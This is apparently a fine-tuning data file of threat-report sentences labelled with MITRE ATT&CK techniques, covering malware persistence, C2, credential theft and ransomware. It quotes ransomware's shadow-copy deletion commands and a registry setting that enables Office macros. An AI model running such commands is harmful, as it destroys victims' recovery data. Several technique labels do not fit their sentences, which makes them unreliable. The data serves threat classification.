550The execution chain ensures that persistence is set on the affected system using a .lnk file in the Startup directory. The .lnk file shown in Figure 17 opens the malicious VBS dropped on the system['T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder']fine_tune
551In the final stage of its attacks, the TeleBots group always used the KillDisk malware to overwrite files with specific file extensions on the victims’ disks. The KillDisk malware used in the first wave of December 2016 attacks, instead of encrypting, simply overwrites targeted files['T1485 - Data Destruction']fine_tune
552If that configuration is not available, it utilizes a hardcoded configuration in the binary. The tool uses a custom binary protocol over sockets for its command and control communication with the GUP Proxy Tool and all transferred data is encrypted using a modified version of RC4 encryption['T1095 - Non-Application Layer Protocol']fine_tune
553The implant receives HTTP-based commands from a control server and parses the HTTP Content-Type and Content-Length from the HTTP header. If the HTTP Content-Type matches the following value, then the implant executes the command specified by the control server['T1071.001 - Application Layer Protocol: Web Protocols']fine_tune
554The compressed_data field is compressed using the common ZLIB compression algorithm. Additionally, in the event data is being sent via HTTP rather than HTTPS, the following additional encryption algorithm is applied to the POST data['T1560.002 - Archive Collected Data: Archive via Library', 'T1573.001 - Symmetric Cryptography']fine_tune
555The macro creates a copy of the files with their proper extensions using Extensible Storage Engine Utilities (esentutil.exe) with the following commands (esentutil.exe is also a legitimate program that is pre-installed in Windows['T1036 - Masquerading']fine_tune
556At the second stage, the attackers remotely connected to the device and scanned the local network seeking to gain access to public shared folders, web servers, and any other open resources. The aim was to harvest information about the network, above all, servers and workstations used for making payments. If the firewall blocked access from one segment of the network to another, but allowed a reverse connection, the attackers used a different payload to build tunnels['T1135 - Network Share Discovery']fine_tune
557Before being deleted, the DLL executes a string decoding routine that is designed to execute for about a minute, spiking central processing unit (CPU) usage for the regsvr32.exe process. Once the strings are decoded, the More_eggs components are decrypted, dropped to the system (normally in the %APPDATA%\Microsoft\ or %ProgramData%\Microsoft\ directories) and executed['T1140 - Deobfuscate/Decode Files or Information']fine_tune
558The very narrow and specific set of email identifiers and organizations observed by CTU researchers strongly indicate that the campaign is focused on U.S. Based on the identified targets, CTU researchers assess with low confidence that a Russian government-sponsored threat group may be responsible for this campaign. Third-party researchers attribute this campaign to the Russia-based IRON RITUAL threat group (also known as NOBELIUM and APT29). IRON RITUAL has been linked to the SUNBURST malware used in the SolarWinds supply chain attack['T1566.002 - Phishing: Spearphishing Link']fine_tune
559Then the article describes how, since the beginning of 2019, the group has been leveraging self-extracting archives to run code['T1053.005 - Scheduled Task/Job: Scheduled Task', 'T1218.010 - Signed Binary Proxy Execution: Regsvr32', 'T1027 - Obfuscated Files or Information']fine_tune
560Finally, the loader spawns cmd.exe to perform a series of reconnaissance commands to obtain information about the network and domain['T1482 - Domain Trust Discovery', 'T1059.003 - Command and Scripting Interpreter: Windows Command Shell']fine_tune
561The checks are done in an obfuscated way within the jumble of the code that the malware has (in the virtual machine used here the Spanish language of Spain (es-ES) was used; it is the code 0xC0A that appears in the stack in the screenshot['T1082 - System Information Discovery']fine_tune
562Gather the names of all services running on the system. Gather a list of the names of all processes running on the endpoint. Get Microsoft Version Number from the registry, specifically from reg key/value: HKEY_CLASSES_ROOT\Excel.Application\CurVer||Default. The instrumentor script also enables all macros for Office by setting the VBAWarnings registry value to 0x1 at: HKCU\Software\Microsoft\Office\<OfficeVersionNumber>.0\Word\Security\VBAWarnings = 0x1['T1012 - Query Registry']fine_tune
563It also creates a folder in C:\SDRSMLINK\ and shares this folder with the rest of the network['T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder', 'T1564.006 - Run Virtual Instance']fine_tune
564In october 2016 Group-IB published the report about the Cobalt group. Now, a year later, this group is continuing to attack banks, which is reported monthly by Group-IB's Threat Intelligence team. Network penetration In all cases investigated by Group-IB, the Cobalt group used a set of spear phishing emails to gain initial access to the corporate infrastructure. However, some of the email addresses belong to employees that no longer work at the organization, which means that the Cobalt group likely uses out-of-date mailing lists. Provision of the malware survivability The Cobalt group uses different methods to ensure malware survivability on corporate networks. From our experience, the Cobalt group uses a new method to provide its survivability in every attack. The former module is installed on a system that has access to the Internet and provides interaction with the C&C server using HTTP/HTTPS/DNS protocols. Another module is installed even in systems that do not have Internet access, as, using SMB protocol (which is typically used within a local network), the SMB module is controlled via infected computers running the HTTP/HTTPS/DNS module. For interaction on HTTPS protocol, HTTP protocol profiles may be used with an indicated SSL certificate, but for data exchange on the DNS protocol, it requires DNS A, AAAA, and TXT records. Conclusion After infecting one computer on an organization's network, the Cobalt group analyzes the programs used on it and search for critical servers and the computers from which they are accessed['T1021.001 - Remote Services: Remote Desktop Protocol']fine_tune
565We recently observed an instance where the FlawedAmmyy downloader was not digitally signed (FlawedAmmyy RAT payload is still signed, however). It could be a blip — perhaps a one-off — but it's still notable['T1553.002 - Code Signing']fine_tune
566Its sole purpose is to load setup.dll using LoadLibraryA. If not, it will attempt to obtain such privileges using token impersonation if the version of Windows is below Windows 7 build 7601; otherwise it will attempt different UAC bypass techniques, allowing installation of the payload loader into one of['T1548.002 - Abuse Elevation Control Mechanism: Bypass User Account Control']fine_tune
567Most of the infected sites use the TYPO3 CMS (see: https://typo3.org/), which could indicate the attackers are abusing a specific vulnerability in this publishing platform['T1071.001 - Application Layer Protocol: Web Protocols']fine_tune
568In the past, Emissary Panda has used many ways to target their victims, with the most notable being the exploits from the Hacking Team leak. Usually, the delivered payload is either the well-known ‘PlugX’ or ‘HttpBrowser’ RAT, a tool which is believed to have Chinese origins and to be used only by certain Chinese hacking groups['T1027 - Obfuscated Files or Information']fine_tune
569Both RATs provide a wide range of functionality on the target machine, ranging from collecting files, watching the screen, to capturing passwords and keystrokes. The RATs also enable the operator to remotely delete files, and spy on the computer user via the microphone or webcam['T1070.004 - Indicator Removal on Host: File Deletion']fine_tune
570A copy of the initial EXE for GuLoader is made persistent, then the original is deleted from the infected user’s AppData\Local\Temp directory where it was originally saved. The GuLoader EXE is persistent through the Windows Registry under the following key['T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder']fine_tune
571And, of course, the attackers added the ability to control the infected machine. The code receives a binary blob official M.E.Doc server, decrypts it using the Triple DES algorithm, and, afterwards, decompresses it using GZip. The result is an XML file that could contain several commands at once. This remote control feature makes the backdoor a fully-featured cyberespionage and cybersabotage platform at the same time['T1070.004 - Indicator Removal on Host: File Deletion']fine_tune
572mailsearcher32 module This module searches the infected system’s files to gather email addresses for information-stealing purposes. Emotet, according to previous research by Brad Duncan, is also responsible for delivering this password-grabbing Trickbot variant, as well as Azorult, to users['T1083 - File and Directory Discovery', 'T1087.003 - Email Account']fine_tune
573Otherwise, it will add the binary’s path to the Software\Microsoft\Windows\CurrentVersion\Run key with —Update as a parameter['T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder']fine_tune
574Once an attacker has admin access to a Domain Controller, the KRBTGT account password hashes can be extracted using Mimikatz['T1550.003 - Use Alternate Authentication Material: Pass the Ticket']fine_tune
575The persistence mechanisms also change, offering the options to use XDG Autostart Entries and crontabs for persistence. We’ve waxed lyrical about crontabs before, but we haven’t explored XDG Autostart Entries in detail['T1547.013 - XDG Autostart Entries']fine_tune
576browser history from Firefox, Google Chrome, Microsoft Edge and Internet Explorer; - usernames and passwords stored in the listed browsers; - email accounts from Microsoft Outlook and Mozilla Thunderbird['T1555.003 - Credentials from Password Stores: Credentials from Web Browsers', 'T1087.003 - Email Account']fine_tune
577After using RTF files, the group started using self-extracting (SFX) archives that use common document icons in an attempt to further mislead their victims. It was briefly documented by Threatbook (in Chinese). When run, these self-extracting RAR files drop and execute DLL files (with a .ocx extension) with the final payload being the previously documented {A96B020F-0000-466F-A96D-A91BBF8EAC96}.dll. This section will describe the technique and what they have altered to achieve their goal['T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder']fine_tune
578H1N1 has added a plethora of new functionality in comparison to earlier reports. Throughout this blog series we will be analyzing the capabilities of H1N1 including: obfuscation, a User Account Control (UAC) bypass, information stealing, data exfiltration, loader/dropper, and self-propagation/lateral movement techniques used by this variant.1,2['T1027 - Obfuscated Files or Information']fine_tune
579Attempted to blend in with a file name that matched the system name it resided on - Configured for persistence via a crontab entry with a @reboot line - Used likely compromised infrastructure for C2['T1036.005 - Masquerading: Match Legitimate Name or Location', 'T1036 - Masquerading']fine_tune
580RAR archiving – files are transferred to staging servers before exfiltration. They may be encrypted or compressed, to make them easier to extract. Certutil – a command-line utility that can be exploited and used for various malicious purposes, such as to decode information, to download files, and to install browser root certificates. Adfind – a command-line tool that can be used to perform Active Directory queries. Csvde – can be used to extract Active Directory files and data. Ntdsutil – can be used as a credential-dumping tool. WMIExec – can be used for lateral movement and to execute commands remotely. It can be used to find information and execute code, and is frequently abused by malicious actors['T1560.001 - Archive Collected Data: Archive via Utility']fine_tune
581In order to collect even more information, from time to time the Zebrocy operators upload and use dumpers on victims’ machines. The current dumpers have some similarities with those previously used by the group. In this case, Yandex Browser, Chromium, 7Star Browser (a Chromium-based browser), and CentBrowser are targeted, as well as versions of Microsoft Outlook from 1997 through 2016['T1555.003 - Credentials from Password Stores: Credentials from Web Browsers']fine_tune
582It also moves the JS file to ‘Shell.NameSpace(28)’ (‘ssfLOCALAPPDATA’ – ‘\AppData\Local’) and creates a scheduled task to use WScript to execute the file at every user log on. The installation routine then copies the keylogger to the registry, sets the uid + 0 flag to 1 to indicate that installation was completed, and executes the scheduled task it created['T1053.005 - Scheduled Task/Job: Scheduled Task']fine_tune
583BADFLICK: a backdoor that is capable of modifying the file system, generating a reverse shell, and modifying its command and control (C2) configuration. China Chopper: a simple code injection webshell that executes Microsoft .NET code within HTTP POST commands. This allows the shell to upload and download files, execute applications with web server account permissions, list directory contents, access Active Directory, access databases, and any other action allowed by the .NET runtime['T1059.004 - Command and Scripting Interpreter: Bash']fine_tune
584Then, the malware loads an executable file from WM_DSP resource and runs a shellcode that contains approximately1500 bytes (after decrypting it with XOR 0x45['T1140 - Deobfuscate/Decode Files or Information']fine_tune
585Kimsuky uses memory dump programs instead of using well-known malicious software and performs the credential extraction offline. It can be used as a general process dump utility that actors can embed in other scripts, as seen by Kimsuky’s inclusion of ProcDump in the BabyShark malware. The victim is then redirected to the official Chrome Web Store page to install a Chrome extension, which has the ability to steal cookies and site passwords and loads a JavaScript file, named jQuery.js, from a separate site (see figure 3).[51(link is external['T1204.002 - User Execution: Malicious File', 'T1555.003 - Credentials from Password Stores: Credentials from Web Browsers']fine_tune
586The impact of finding this implant on your network is severe and most likely indicates the presence of other footholds or compromised systems. This backdoor provides ample capability for the attacker to propagate and compromise other hosts and critical data using this as a very stealthy beachhead['T1556.004 - Network Device Authentication']fine_tune
587InvisiMole is capable of scanning enabled wireless networks on the compromised system. It records information such as the SSID and MAC address of the visible Wi-Fi access points['T1016 - System Network Configuration Discovery']fine_tune
588Besides the stolen data, it sends the Windows product name and version, username, computer name, and domain name to the C&C server['T1082 - System Information Discovery']fine_tune
589The implant has the capability of gathering data from the victim’s system. The following information will be gathered and sent to the command and control server['T1560.002 - Archive Collected Data: Archive via Library']fine_tune
590The threat actors also collected the files “ntds.dit” and the “SYSTEM” registry hive. DHS observed the threat actors compress all of these files into archives named “SYSTEM.zip” and “comps.zip['T1560 - Archive Collected Data']fine_tune
591Malicious Word .doc file Besides the .pps file, the threat actor uses rich text files to deliver the malware. While other researchers have reported that these files exploit CVE-2012-0158, Symantec has also observed CVE-2015-1641 being exploited to drop Backdoor.Steladok['T1189 - Drive-by Compromise', 'T1203 - Exploitation for Client Execution']fine_tune
592Quickly after the initial compromise, the operator deploys a tool named "dog.exe. This malware is written in .NET and its purpose is to monitor hard drive paths and to exfiltrate the information via an email account or an FTP, depending on the configuration. The configuration file is named dconf.json['T1048 - Exfiltration Over Alternative Protocol']fine_tune
593Stealth Falcon demonstrates some familiarity with the patterns of behavior, interests, and activities of its targets, suggesting that the operators may have been working with other sources of information about their targets’ behaviors. In addition, Stealth Falcon displayed above-average operational security throughout the campaign. Stealth Falcon also shows familiarity with creating and maintaining a range of fictitious personas, and registering and managing a significant amount of attack and C2 infrastructure with concern for operational security['T1041 - Exfiltration Over C2 Channel']fine_tune
594The malware families used in this campaign consisted mainly of malicious documents featuring CARROTBAT downloaders with SYSCON payloads, but also included a new malware downloader Unit 42 has dubbed CARROTBALL['T1204.002 - User Execution: Malicious File']fine_tune
595Upon execution, the payload injects into iexplore.exe process and starts encrypting text files and documents of the victim machine['T1055 - Process Injection']fine_tune
596GOLD CABIN uses malicious documents, often contained in password-protected archives, delivered through email to download and execute payloads. The second-stage payloads are most frequently Gozi ISFB (Ursnif) or IcedID (Bokbot), sometimes using intermediary malware like Valak. GOLD CABIN infrastructure relies on artificial appearing and frequently changing URLs created with a domain generation algorithm (DGA). The URLs host a PHP object that returns the malware as a DLL file.ToolsTaegis™ XDR Adversary Software Coverage Tool['T1568.002 - Domain Generation Algorithms']fine_tune
597Using valid credentials, CARBON SPIDER moves laterally through victim environments using RDP and occasionally SSH. Occasionally, CARBON SPIDER has deployed the legitimate GoToAssist or TightVNC tools to provide redundant control of hosts['T1078 - Valid Accounts']fine_tune
598The Gamaredon group uses a package that includes a custom Microsoft Outlook Visual Basic for Applications (VBA) project. Using Outlook macros to deliver malware is something we rarely see while investigating malicious campaigns['T1106 - Native API', 'T1218.011 - Signed Binary Proxy Execution: Rundll32', 'T1120 - Peripheral Device Discovery', 'T1059.005 - Command and Scripting Interpreter: Visual Basic']fine_tune
599Numerous other similarities are present in addition to system reconnaissance methods; the communication mechanism uses the same user agent string as Gold Dragon['T1071.001 - Application Layer Protocol: Web Protocols']fine_tune
600Proofpoint researchers frequently observe Silent Librarian’s phishing attempts originating from a university unrelated to their current target using a separate, unrelated university’s URL shortening service. This short URL links to a phishing landing page either directly or via one or more third-party sites that eventually lands the user on a clone of a login portal hosted on an actor-controlled server['T1588.002 - Tool', 'T1598.003 - Spearphishing Link', 'T1608.005 - Link Target']fine_tune
601The functional payload is a DLL compiled on 2019-03-11 02:23:54, which has two functionalities depending if the binary has a command line argument -daemon or -worker passed to it. The daemon functionality handles the C2 communications portion of the Trojan, which is configured to communicate with 185.12.45[.]134 over HTTPS using the following URL['T1071.001 - Application Layer Protocol: Web Protocols']fine_tune
602An official website of the United States government . Here’s how you know . Official websites use .gov A .gov website belongs to an official government organization in the United States. Secure .gov websites use HTTPS A lock (LockA locked padlock) or https:// means you’ve safely connected to the .gov website. O’Reilly of the Defense Criminal Investigative Service (DCIS) of the U.S. Among other things, Zhu and Zhang registered IT infrastructure that the APT10 Group used for its intrusions and engaged in illegal hacking operations. The indictment alleges that the defendants were part of a group that hacked computers in at least a dozen countries and gave China’s intelligence service access to sensitive business information,” said Deputy Attorney General Rosenstein. It's going to take all of us working together to protect our economic security and our way of life, because the American people deserve no less. The APT10 Group used some of the same online facilities to initiate, facilitate and execute its campaigns during the conspiracy. Earlier, beginning in or about 2006, members of the APT10 Group, including Zhu and Zhang, engaged in an intrusion campaign to obtain unauthorized access to the computers and computer networks of more than 45 technology companies and U.S. To avoid antivirus detection, the malware was installed using malicious files that masqueraded as legitimate files associated with the victim computer’s operating system. Such malware enabled members of the APT10 Group to monitor victims’ computers remotely and steal user credentials['T1199 - Trusted Relationship']fine_tune
603The Iranian attacker group (APT35) and the Chinese attacker group (APT31) targeted campaign staffers’ personal emails with credential phishing emails and emails containing tracking links. As part of our wider tracking of APT31 activity, we've also seen them deploy targeted malware campaigns['T1598 - Phishing for Information']fine_tune
604PLEAD and KIVARS, for instance, share the use of RTLO techniques to disguise their installers as documents. Both also use decoy documents to make the RTLO attack more convincing. Another similarity is the use of a small loader component to load encrypted backdoors into memory['T1204.002 - User Execution: Malicious File']fine_tune
605Nyetya requires user credentials to spread itself laterally via the PsExec and WMI vectors (which are detailed in the "Malware Functionality" section). Talos has identified three ways Nyetya can obtain these credentials. First, credentials can be manually passed in via a command line argument['T1078.003 - Valid Accounts: Local Accounts']fine_tune
606Often service accounts are members of Domain Admins (or equivalent) or a Domain Admin was recently logged on to the computer an attacker dump credentials from. Using these credentials, an attacker can gain access to a Domain Controller and get all domain credentials, including the KRBTGT account NTLM hash which is used to create Kerberos Golden Tickets['T1550.003 - Use Alternate Authentication Material: Pass the Ticket']fine_tune
607Analysis of the threat actor’s indicators of compromise (IOCs) and tactics, techniques, and procedures (TTPs) indicates a correlation with the group known by the names, Pioneer Kitten and UNC757. This threat actor has been observed exploiting several publicly known Common Vulnerabilities and Exposures (CVEs) dealing with Pulse Secure virtual private network (VPN), Citrix NetScaler, and F5 vulnerabilities. This threat actor used these vulnerabilities to gain initial access to targeted networks and then maintained access within the successfully exploited networks for several months using multiple means of persistence['T1190 - Exploit Public-Facing Application']fine_tune
608The touch utility sets the modification and access times of files. If any file does not exist, it is created with default permissions. This makes the utility useful to malware in two common scenarios: for creating an empty file at a given path that is later passed data, and/or for changing the timestamp on a file as a means of evasion, also known as “timestomping['T1222.002 - File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification']fine_tune
609For the rest, we acknowledge that the subdomains used could be indicative of the target; they could also be used to go after third parties that might trust those organizations['T1583.001 - Domains']fine_tune
610Both backdoors target Arabic-speaking users. They use code that checks if the compromised machine has the Arabic language installed['T1614.001 - System Location Discovery: System Language Discovery', 'T1614.001 - System Location Discovery: System Language Discovery']fine_tune
611Digital delivery of over 3,000 APT1 indicators, such as domain names, and MD5 hashes of malware. Thirteen (13) X.509 encryption certificates used by APT1. A set of APT1 Indicators of Compromise (IOCs) and detailed descriptions of over 40 malware families in APT1's arsenal of digital weapons. IOCs that can be used in conjunction with Redline™, Mandiant's free host-based investigative tool, or with Mandiant Intelligent Response® (MIR), Mandiant's commercial enterprise investigative tool['T1036.005 - Masquerading: Match Legitimate Name or Location']fine_tune
612Doki uses a previously undocumented method to contact its operator by abusing the Dogecoin cryptocurrency blockchain in a unique way in order to dynamically generate its C2 domain address. The malware has managed to stay under the radar for over six months despite samples being publicly available in VirusTotal['T1102 - Web Service']fine_tune
613Using job opportunities as template is the known method used by Lazarus to target its victims. The documents created by this actor are well designed and contain a large icon for a known company such as LockHeed Martin, BAE Systems, Boeing and Northrop Grumman in the template. In this campaign the actor has targeted people that are looking for job opportunities at Lockheed Martin. Targeting the defense industry and specifically Lockheed Martin is a known target for this actor['T1566.001 - Phishing: Spearphishing Attachment']fine_tune
614Since this malicious extension is trying to pass for a legitimate Chrome plugin, Grandoreiro’s developer named it “Google Plugin” version 1.5.0. Visually, it adds a square button to the browser window instead of the “cookie” button on the original plugin['T1176 - Browser Extensions']fine_tune
615Before writing a keystroke to the log, the malware obtains the current locale identifier using the ‘GetKeyboardLayout’ API. The retrieved value is checked against several hardcoded paths in which the low DWORD is set to 0x0429['T1614.001 - System Location Discovery: System Language Discovery']fine_tune
616According to the public source data, these airlines use services of the same IT service provider. To help companies detect and hunt for ColunmTK, we have provided a full list of indicators of compromise (IOCs) that we retrieved. It came to light that the cyberattack on this IT service provider affected 4,500,000 data subjects globally, including data related to Air India's customers. ColunmTK Timeline Connections with APT41 Group-IB researchers believe with moderate confidence that the ColunmTK campaign was carried out by APT41, a prolific Chinese-speaking nation-state threat actor. APT41, also known as WICKED SPIDER (PANDA), Winnti Umbrella, and BARIUM, is believed to have been engaging in state-sponsored espionage in China's interests as well as committing financially motivated cybercrimes. APT41 is known for stealing digital certificates for its cyber espionage operations. The IP address was also used to host the Cobalt Strike framework and shared an SSL certificate, b3038101fd0e8b11c519f739f12c7e9b60234d3b, with ColunmTK's IP address 185[.]118[.]166[.]66. Source: Group-IB Threat Intelligence & Attribution Another interesting domain is service[.]dns22[.]ml. In both cases, the files were used to establish persistence in the network. The files are very similar in the way they launch a DLL file as a service and create keys in the registry['T1543.003 - Create or Modify System Process: Windows Service']fine_tune
617FireEye Intelligence has previously reported that APT33 has ties to destructive malware, and they pose a heightened risk to critical infrastructure. This risk is pronounced in the energy sector, which we consistently observe them target. That targeting aligns with Iranian national priorities for economic growth and competitive advantage, especially relating to petrochemical production['T1110.003 - Brute Force: Password Spraying']fine_tune
618Given Lazarus’ use of a wide array of tools and techniques in their operations, it’s reasonable to assume that the group will continue to use ever-evolving tactics in their malicious activities. Overall, an organization will need multilayered security strategies, as Lazarus and other similar groups are experienced cybercriminals who employ different strategies to get past organizational defenses['T1189 - Drive-by Compromise']fine_tune
619After the wiping procedure, the malware tries to delete the shadow copies by running the following commands: vssadmin.exe delete shadows /all /quiet **and **C:\\Windows\\system32\\wbem\\wmic.exe shadowcopy delete. Finally, the malware enters an infinite loop where it sleeps based on the is_alive_loop_interval value from the configuration file and writes "Meteor is still alive['T1047 - Windows Management Instrumentation']fine_tune
"As can be seen above, the script gathers OS version, a session UID and machine ID, all of which it posts to the server for processing","['T1082 - System Information Discovery']",fine_tune
"According to the public source data, these airlines use services of the same IT service provider. It came to light that the cyberattack on this IT service provider affected 4,500,000 data subjects globally, including data related to Air India's customers. Compromise of Air India's network In mid-February 2021, Group-IB's Threat Intelligence & Attribution system detected infected devices that were part of Air India's computer network. It took the attackers 24 hours and 5 minutes to spread Cobalt Strike beacons to other devices in the airline's network. ColunmTK Timeline Connections with APT41 Group-IB researchers believe with moderate confidence that the ColunmTK campaign was carried out by APT41, a prolific Chinese-speaking nation-state threat actor. According to Group-IB's Threat Intelligence & Attribution system, the threat actor has been active since at least 2007. APT41 is known for stealing digital certificates for its cyber espionage operations. The IP address was also used to host the Cobalt Strike framework and shared an SSL certificate, b3038101fd0e8b11c519f739f12c7e9b60234d3b, with ColunmTK's IP address 185[.]118[.]166[.]66. The file is very similar to one used by APT41 in a different campaign described by FireEye researchers. The files are very similar in the way they launch a DLL file as a service and create keys in the registry","['T1569.002 - System Services: Service Execution']",fine_tune
"Additionally, the attackers used a genuine code-signing certificate issued to a Cyprus-based company called Hermetica Digital Ltd","['T1553.002 - Code Signing']",fine_tune
"Use automated methods, such as scripts, for collecting data (Automated Collection [T1119]) - Capture user input to obtain credentials and collect information (Input Capture [T1056]) - Collect local systems data from a compromised system (Data from Local System [T1005]) - Take screen captures of the desktop (Screen Capture [T1113]) - Collect data stored in the Windows clipboard from users (Clipboard Data [T1115","['T1005 - Data from Local System']",fine_tune
"A service DLL (loaded by svchost.exe) with a ServiceMain function typically named NetSetupServiceMain - A standard non-Service DLL loaded by rundll32.exe","['T1558.003 - Steal or Forge Kerberos Tickets: Kerberoasting']",fine_tune
"OSX/Keydnap uses a Tor2Web proxy for command and control. An installed launch agent, icloudproc, is automatically started by the OS, and listens on 127.0.0.1:9050. As noted by ESET, the main backdoor component (icloudsyncd) uses this proxy for communication purposes: “Keydnap is using the onion.to Tor2Web proxy over HTTPS to report back to its C&C server","['T1543.001 - Create or Modify System Process: Launch Agent']",fine_tune
"Communication over DNS tunnel with a hardcoded domain name and DGA-generated subdomain - C2 traffic encrypted with RSA-2048 - Custom AES-encrypted storage format used to store configuration, plugins, and harvested data - Unique version number for each sample","['T1071.004 - Application Layer Protocol: DNS', 'T1027 - Obfuscated Files or Information']",fine_tune
"Volexity is seeing active in-the-wild exploitation of multiple Microsoft Exchange vulnerabilities used to steal e-mail and compromise networks. In January 2021, through its Network Security Monitoring service, Volexity detected anomalous activity from two of its customers' Microsoft Exchange servers. This vulnerability is remotely exploitable and does not require authentication of any kind, nor does it require any special knowledge or access to a target environment. Additionally, Volexity is providing alternative mitigations that may be used by defenders to assist in securing their Microsoft Exchange instances. This vulnerability has been confirmed to exist within the latest version of Exchange 2016 on a fully patched Windows Server 2016 server. Volexity also confirmed the vulnerability exists in Exchange 2019 but has not tested against a fully patched version, although it believes they are vulnerable. There are two methods to download e-mail with this vulnerability, depending on the way that Microsoft Exchange has been configured. In the case where a single server is being used to provide the Exchange service, Volexity believes the attacker must know the targeted user’s domain security identifier (SID) in order to access their mailbox. Further, other notable User-Agent entries are tied to tools used for post-exploitation access to webshells. Network Indicators - Attacker IPs. Volexity has observed numerous IP addresses leveraged by the attackers to exploit the vulnerabilities described in this blog","['T1190 - Exploit Public-Facing Application']",fine_tune
"The analyzed sample of NotPetya encrypts the compromised system’s files with a 128-bit Advanced Encryption Standard (AES) algorithm during runtime. The malware then writes a text file on the “C:\” drive that includes a static Bitcoin wallet location as well as a unique personal installation key intended for the victim to use when making the ransom payment and the user’s Bitcoin wallet ID. NotPetya modifies the master boot record (MBR) to enable encryption of the master file table (MFT) and the original MBR, and then reboots the system. Based on the encryption methods used, it appears unlikely that the files could be restored, even if the attacker received the victim’s unique key and Bitcoin wallet ID","['T1486 - Data Encrypted for Impact']",fine_tune
"The campaigns use a TrickBot downloader that is signed and uses an icon to pretend it is a Microsoft Word document. When the user double-clicks the file, they are presented with a decoy message box. To avoid suspicion, the decoy message suggests the user should update Microsoft Word or open the file from another computer","['T1555.003 - Credentials from Password Stores: Credentials from Web Browsers']",fine_tune
"To achieve privilege escalation within the environment, FIN6 utilized a named pipe impersonation technique included within the Metasploit framework that allows for SYSTEM-level privilege escalation","['T1134 - Access Token Manipulation']",fine_tune
"It then calls the EnumWindows() API function to enumerate all windows on the victim’s system. Its EnumFunc() callback function collects all window titles and then adds a 14H-long random string prefix. One mixed window title looks like this: “{14H long random string}+windows title”. All the mixed window titles are added into a string list box control","['T1010 - Application Window Discovery']",fine_tune
"As my analysis in the previous blog showed, Agent Tesla is spyware. It monitors and collects the victim’s keyboard inputs, system clipboard, and screenshots of the victim’s screen, as well as collecting credentials from a variety of installed software. So far, through my quick analysis, this version is similar to the older one","['T1082 - System Information Discovery']",fine_tune
"We’ve seen the adversary staging data on a remote system or on the local system. Most of the time the data is compressed and copied at the same time. Only a handful of times does the adversary copy the data first before compressing (archive collected data) and exfiltrating it. The adversary compresses and encrypts the data by using WinRAR from the command line","['T1124 - System Time Discovery']",fine_tune
"A macro in the Microsoft Word document contained the malicious code designed to download and execute additional malicious software on the infected system","['T1566.001 - Phishing: Spearphishing Attachment', 'T1566.001 - Phishing: Spearphishing Attachment']",fine_tune
"PACT has reverse engineered the DGA, dynamically analyzed the malware, investigated the Threat Actor’s (TA) web-based infrastructure, and consolidated the results of our analysis into the following report","['T1070.004 - Indicator Removal on Host: File Deletion']",fine_tune
"From September to December 2018 the RTM group sent out more than 11,000 malicious emails. The cybercriminals, however, are not going to stop there, as evidenced by the new malicious campaigns that we track as part of our ongoing threat intelligence activities. Where do we begin our search? Let's start with simple things: we will take the NTUSER.DAT registry file with the latest modification date from the user directory (C:\Users\%username%\), and extract data from it using RegRipper. In general, you do not have to stick to the Sleuth Kit at all; there are more convenient tools like FTK Imager, a free tool, which can be used not only to create forensic images, but also to examine their contents. Let's take a closer look at apg.exe and use PPEE: This looks like TeamViewer and is signed as TeamViewer, so does this mean it indeed is TeamViewer? Judging by the file's size, it has nothing to do with the original msi.dll, so it is clearly DLL Search Order Hijacking. The operating system starts searching for the necessary libraries from the current directory, which means that instead of the legitimate msi.dll, the one located in b7mg81 will be loaded. Another interesting file is TeamViewer.ini: Here is anti-forensics: according to the configuration file, our ""TeamViewer"" did not keep any logs, and was apparently used as a RAT (Remote Access Trojan). Well, not bad. I think we can use the Sleuth Kit again","['T1574.001 - Hijack Execution Flow: DLL Search Order Hijacking']",fine_tune
"The attackers orchestrate attacks using batch or PowerShell scripts that are executed, with the help of domain controllers, on any machine the DC can reach. The scripts retrieve the attackers’ payloads using psexec or certutil","['T1105 - Ingress Tool Transfer', 'T1569.002 - System Services: Service Execution', 'T1059.003 - Command and Scripting Interpreter: Windows Command Shell']",fine_tune
"Note that the browser itself is not hooked. Executing the browser from any other Chrome shortcut link will start and run it normally without the malicious extension, canceling out the malware’s ability to control what the victim does","['T1547.009 - Boot or Logon Autostart Execution: Shortcut Modification']",fine_tune
"The Epic backdoors are commanded by a huge network of hacked servers that deliver command and control functionality","['T1049 - System Network Connections Discovery']",fine_tune
"Capture the current screen (screenshot) and save the screenshot as a JPEG to ""C:\ProgramData\tsc"". The contents of the file are subsequently read and sent to the C2. Code to capture a screenshot as a bitmap and save it to a file","['T1113 - Screen Capture']",fine_tune
"Sodinokibi attempts to encrypt data in a user's directory and delete shadow copy backups to make data recovery more difficult. This vulnerability is easy for attackers to exploit, as anyone with HTTP access to the WebLogic server could carry out an attack. Attackers have been making use of this exploit in the wild since at least April 17. Initial stages of the ransomware attack occurred on April 25, the day before Oracle released their update. The attackers are downloading the Sodinokibi ransomware. In this case, the attackers simply leveraged the Oracle WebLogic vulnerability, causing the affected server to download a copy of the ransomware from attacker-controlled IP addresses 188.166.74[.]218 and 45.55.211[.]79. The 188.166.74[.]218 IP address is also home to a pair of other malicious domains unrelated to this ransomware attack: arg0s-co[.]uk, which is likely a phishing domain, and projectstore[.]guru, a domain with bogus PDF-related Google search results. The other IP, 45.55.211[.]79, hosts a pair of legitimate Chilean domains, and appears to have been infected and repurposed by the attackers. The attackers were ultimately successful at encrypting a number of systems during this incident. Cisco IR Services and Talos observed the attack requests originating from 130.61.54[.]136","['T1105 - Ingress Tool Transfer']",fine_tune
"Exploits a kernel privilege escalation vulnerability to gain SYSTEM privileges using CVE-2018-8453. REvil uses Hypertext Transfer Protocol Secure (HTTPS) for communication with its controllers","['T1071.001 - Application Layer Protocol: Web Protocols']",fine_tune
"The attackers dropped Visual Basic and PowerShell scripts in folders that they created under ProgramData (a hidden folder, by default). The attackers created persistence using Windows’ registry, services and scheduled tasks. This persistence mechanism ensured that the loader scripts would execute either at startup or at predetermined intervals","['T1053.005 - Scheduled Task/Job: Scheduled Task', 'T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder']",fine_tune
